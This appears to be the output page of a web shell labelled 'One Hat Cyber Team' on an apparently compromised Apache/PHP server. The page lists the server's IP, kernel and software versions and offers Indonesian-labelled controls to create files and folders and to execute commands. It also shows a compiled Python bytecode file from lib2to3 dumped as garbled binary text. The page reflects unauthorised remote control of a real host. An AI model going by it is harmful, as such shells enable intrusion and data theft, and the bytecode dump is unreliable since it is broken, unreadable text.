One Hat Cyber Team
Your IP :
10.30.1.1
Server IP :
103.148.201.5
Server :
Linux web-olt 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Server Software :
Apache/2.4.52 (Ubuntu)
PHP Version :
8.1.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
python3.10
/
lib2to3
/
fixes
/
__pycache__
/
View File Name :
fix_basestring.cpython-310.pyc
o ��bc@ � @ s2 d Z ddlmZ ddlmZ G dd� dej�ZdS )zFixer for basestring -> str.� )� fixer_base)�Namec @ s e Zd ZdZdZdd� ZdS )� FixBasestringTz'basestring'c C s t d|jd�S )N�str)�prefix)r r )�self�node�results� r �3/usr/lib/python3.10/lib2to3/fixes/fix_basestring.py� transform s zFixBasestring.transformN)�__name__� __module__�__qualname__� BM_compatible�PATTERNr r r r r r s r N)�__doc__� r � fixer_utilr �BaseFixr r r r r �<module> s